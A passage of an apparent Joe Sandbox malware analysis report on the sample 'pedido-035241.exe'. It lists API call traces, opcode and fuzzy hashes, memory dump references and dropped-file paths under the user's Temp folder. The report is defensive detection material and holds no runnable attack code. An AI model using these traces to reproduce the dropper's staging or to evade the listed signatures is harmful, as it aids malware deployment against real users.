• Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 74117c3da1d14bbcbc4f92c0e0eb3ebd0fff66770c46117da5e433d52de2638c
• Instruction ID: 22c14ff0de7d99e8655fd7423acc63eaa31bea8074cc9abcc6b2c74ee929f0f7
• Opcode Fuzzy Hash: 74117c3da1d14bbcbc4f92c0e0eb3ebd0fff66770c46117da5e433d52de2638c
• Instruction Fuzzy Hash: 54C09B71740706BBEE608F519D49F1777586750700F298579B755F60D0C674E410DA1C
APIs
• SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 3ca17ea631bf80887aa3d9427a31a3d2622a0e2ccdc50664b5f44c823975825e
• Instruction ID: a70792fcf8e9dbddb4bc54a752e2f47ec30058e0f009e109d264f56951a5bac9
• Opcode Fuzzy Hash: 3ca17ea631bf80887aa3d9427a31a3d2622a0e2ccdc50664b5f44c823975825e
• Instruction Fuzzy Hash: 28B09236281A00EBDE614B00EE09F457A62A768701F008468B641240B0CAB240A5DB19
APIs
• SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,00403847,?), ref: 004034BD
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
• Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
• Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
• Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
APIs
• KiUserCallbackDispatcher.NTDLL(?,0040425C), ref: 0040448F
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
• Opcode ID: 6342aa29cb2c9815646e1c742645cf47b0e1b8d5e1fd84f5a818bc9ff96277f1
• Instruction ID: c8b2e0b7737fb6f3a2012ed53d18a955e8c044ab00f5fdb14f1eccf879f4c073
• Opcode Fuzzy Hash: 6342aa29cb2c9815646e1c742645cf47b0e1b8d5e1fd84f5a818bc9ff96277f1
• Instruction Fuzzy Hash: 6FA001B6604500ABDE129FA1EF09D0ABF72EBA4702B418579E28590034CB364961EF1D
APIs
  • Part of subcall function 00405569: lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
  • Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
  • Part of subcall function 00405569: lstrcatW.KERNEL32(Completed,004033ED,004033ED,Completed,00000000,00418EC0,00000000), ref: 004055C4
  • Part of subcall function 00405569: SetWindowTextW.USER32(Completed,Completed), ref: 004055D6
  • Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
  • Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
  • Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
  • Part of subcall function 00405AEA: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426710,00000000,00000000), ref: 00405B13
  • Part of subcall function 00405AEA: CloseHandle.KERNEL32(?), ref: 00405B20
• CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
  • Part of subcall function 0040697F: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406990
  • Part of subcall function 0040697F: GetExitCodeProcess.KERNEL32(?,?), ref: 004069B2
  • Part of subcall function 0040644E: wsprintfW.USER32 ref: 0040645B
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
• String ID:
• API String ID: 2972824698-0
• Opcode ID: 2ab75a58c523acbc0361d9fc04dc8565c439a36a222869eb1b3daa153588a202
• Instruction ID: 8c0427486d29053335645041865d96f0af5997519b71f4a23b4502285a2a7229
• Opcode Fuzzy Hash: 2ab75a58c523acbc0361d9fc04dc8565c439a36a222869eb1b3daa153588a202
• Instruction Fuzzy Hash: 4AF09072904012EBCB21ABA59994E9E72A4DF00318F25413BE102B21E1D77C4E528AAE
APIs
• GetDlgItem.USER32(?,000003FB), ref: 004049A3
• SetWindowTextW.USER32(00000000,?), ref: 004049CD
• SHBrowseForFolderW.SHELL32(?), ref: 00404A7E
• CoTaskMemFree.OLE32(00000000), ref: 00404A89
• lstrcmpiW.KERNEL32(: Completed,00423708,00000000,?,?), ref: 00404ABB
• lstrcatW.KERNEL32(?,: Completed), ref: 00404AC7
• SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404AD9
  • Part of subcall function 00405B4B: GetDlgItemTextW.USER32(?,?,00000400,00404B10), ref: 00405B5E
  • Part of subcall function 0040678E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 004067F1
  • Part of subcall function 0040678E: CharNextW.USER32(?,?,?,00000000,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406800
  • Part of subcall function 0040678E: CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406805
  • Part of subcall function 0040678E: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406818
• GetDiskFreeSpaceW.KERNEL32(004216D8,?,?,0000040F,?,004216D8,004216D8,?,00000001,004216D8,?,?,000003FB,?), ref: 00404B9C
• MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BB7
  • Part of subcall function 00404D10: lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
  • Part of subcall function 00404D10: wsprintfW.USER32 ref: 00404DBA
  • Part of subcall function 00404D10: SetDlgItemTextW.USER32(?,00423708), ref: 00404DCD
Strings
Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
• String ID: : Completed$A$C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner
• API String ID: 2624150263-39638649
APIs
• CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
Strings
• C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Flyvevaabnene, xrefs: 00402269
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: CreateInstance
• String ID: C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Flyvevaabnene
• API String ID: 542301482-4197813180
APIs
• FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: FileFindFirst
• String ID:
• API String ID: 1974802433-0
APIs
• GetDlgItem.USER32(?,000003F9), ref: 00404EE8
• GetDlgItem.USER32(?,00000408), ref: 00404EF3
• GlobalAlloc.KERNEL32(00000040,?), ref: 00404F3D
• LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F54
• SetWindowLongW.USER32(?,000000FC,004054DD), ref: 00404F6D
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404F81
• ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404F93
• SendMessageW.USER32(?,00001109,00000002), ref: 00404FA9
• SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FB5
• SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FC7
• DeleteObject.GDI32(00000000), ref: 00404FCA
• SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404FF5
• SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405001
• SendMessageW.USER32(?,00001132,00000000,?), ref: 0040509C
• SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 004050CC
  • Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6
• SendMessageW.USER32(?,00001132,00000000,?), ref: 004050E0
• GetWindowLongW.USER32(?,000000F0), ref: 0040510E
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040511C
• ShowWindow.USER32(?,00000005), ref: 0040512C
• SendMessageW.USER32(?,00000419,00000000,?), ref: 00405227
• SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040528C
• SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052A1
• SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052C5
• SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004052E5
• ImageList_Destroy.COMCTL32(?), ref: 004052FA
• GlobalFree.KERNEL32(?), ref: 0040530A
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405383
• SendMessageW.USER32(?,00001102,?,?), ref: 0040542C
• SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040543B
• InvalidateRect.USER32(?,00000000,00000001), ref: 00405466
• ShowWindow.USER32(?,00000000), ref: 004054B4
• GetDlgItem.USER32(?,000003FE), ref: 004054BF
• ShowWindow.USER32(00000000), ref: 004054C6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
• String ID: $M$N
• API String ID: 2564846305-813528018
                                                                                                                                                                            • Opcode ID: fcc7e91b83617d145af11aec22520696422ccde9284fa118c4a43dbc05db5981
                                                                                                                                                                            • Instruction ID: f25f8d73efcf6ba6a17deb726488d783a00b9a1a7703c2d4830b1b44d3514242
                                                                                                                                                                            • Opcode Fuzzy Hash: fcc7e91b83617d145af11aec22520696422ccde9284fa118c4a43dbc05db5981
                                                                                                                                                                            • Instruction Fuzzy Hash: 34027D70A00609EFDB20DF95CC45AAF7BB5FB84315F10817AE910BA2E1D7798A52CF58
                                                                                                                                                                            APIs
                                                                                                                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046C0
                                                                                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004046D4
                                                                                                                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004046F1
                                                                                                                                                                            • GetSysColor.USER32(?), ref: 00404702
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404710
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040471E
                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 00404723
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404730
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404745
                                                                                                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 0040479E
                                                                                                                                                                            • SendMessageW.USER32(00000000), ref: 004047A5
                                                                                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004047D0
                                                                                                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404813
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00404821
                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 00404824
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0040483D
                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 00404840
                                                                                                                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040486F
                                                                                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404881
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                            • String ID: : Completed$N
                                                                                                                                                                            • API String ID: 3103080414-2140067464
                                                                                                                                                                            • Opcode ID: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
                                                                                                                                                                            • Instruction ID: bd26b540472948519bfd0c296b0258925a36bd111cdc3ec084d9598cfd27fd02
                                                                                                                                                                            • Opcode Fuzzy Hash: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
                                                                                                                                                                            • Instruction Fuzzy Hash: A16180B1900209FFDB10AF61DD85AAA7B69FB84314F00853AFA05B62D1C7789D61CF99
                                                                                                                                                                            APIs
                                                                                                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                            • DrawTextW.USER32(00000000,00429220,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                            • String ID: F
                                                                                                                                                                            • API String ID: 941294808-1304234792
                                                                                                                                                                            • Opcode ID: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
                                                                                                                                                                            • Instruction ID: ce1ac2179a7edcd12a9bbec6f3b07c603adbad34dac6b1105353c89659c02e28
                                                                                                                                                                            • Opcode Fuzzy Hash: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
                                                                                                                                                                            • Instruction Fuzzy Hash: 63417B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0CB74DA55DFA4
                                                                                                                                                                            APIs
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004062E8,?,?), ref: 00406188
                                                                                                                                                                            • GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 00406191
                                                                                                                                                                              • Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
                                                                                                                                                                              • Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E
                                                                                                                                                                            • GetShortPathNameW.KERNEL32(?,004275A8,00000400), ref: 004061AE
                                                                                                                                                                            • wsprintfA.USER32 ref: 004061CC
                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,004275A8,C0000000,00000004,004275A8,?,?,?,?,?), ref: 00406207
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406216
                                                                                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040624E
                                                                                                                                                                            • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004269A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062A4
                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 004062B5
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062BC
                                                                                                                                                                              • Part of subcall function 00405FF7: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\pedido-035241.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
                                                                                                                                                                              • Part of subcall function 00405FF7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                            • String ID: %ls=%ls$[Rename]
                                                                                                                                                                            • API String ID: 2171350718-461813615
                                                                                                                                                                            • Opcode ID: dc4682ef79e092581efd41d4f88914fec7f2984e6363dc945e8c6098decd7ff7
                                                                                                                                                                            • Instruction ID: ee14a5085299e91e75cde0480e6b7733258fb9cdf367bc6c01a907801337673b
                                                                                                                                                                            • Opcode Fuzzy Hash: dc4682ef79e092581efd41d4f88914fec7f2984e6363dc945e8c6098decd7ff7
                                                                                                                                                                            • Instruction Fuzzy Hash: 03312130201715BFD2207B619D48F2B3AACEF41718F16007EBD42F62C2DE3C982586AD
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 004044E7
                                                                                                                                                                            • GetSysColor.USER32(00000000), ref: 00404525
• SetTextColor.GDI32(?,00000000), ref: 00404531
• SetBkMode.GDI32(?,?), ref: 0040453D
• GetSysColor.USER32(?), ref: 00404550
• SetBkColor.GDI32(?,?), ref: 00404560
• DeleteObject.GDI32(?), ref: 0040457A
• CreateBrushIndirect.GDI32(?), ref: 00404584
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
